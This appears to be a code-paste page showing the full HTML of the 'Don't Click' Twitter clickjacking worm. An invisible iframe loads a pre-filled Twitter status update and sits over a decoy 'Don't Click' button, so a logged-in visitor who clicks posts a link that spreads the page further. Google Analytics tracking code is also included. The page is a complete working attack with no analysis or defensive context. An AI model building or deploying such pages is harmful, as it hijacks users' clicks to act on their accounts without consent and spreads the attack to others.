Wrap text
Report abuse
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
|
<!DOCTYPE html>
<html>
<head>
<title>Twitter: Don't Click</title>
<style>
iframe {
position: absolute;
width: 550px;
height: 228px;
top: -170px;
left: -400px;
z-index: 2;
opacity: 0;
filter: alpha(opacity=0);
}
button {
position: absolute;
top: 10px;
left: 10px;
z-index: 1;
width: 120px;
}
</style>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-326980-19");
pageTracker._trackPageview();
} catch(err) {}</script>
</head>
<body>
<iframe src="http://twitter.com/home?status=Don't Click: http://tinyurl.com/amgzs6" scrolling="no"></iframe>
<button>Don't Click</button>
<p style="margin-top:50px;"> </p>
<p style="margin-top:50px;"> </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
Source: <a href="http://tinyurl.com/bopa9l" rel="nofollow" target="_blank">Korben.Info</a>
</body>
</html>
|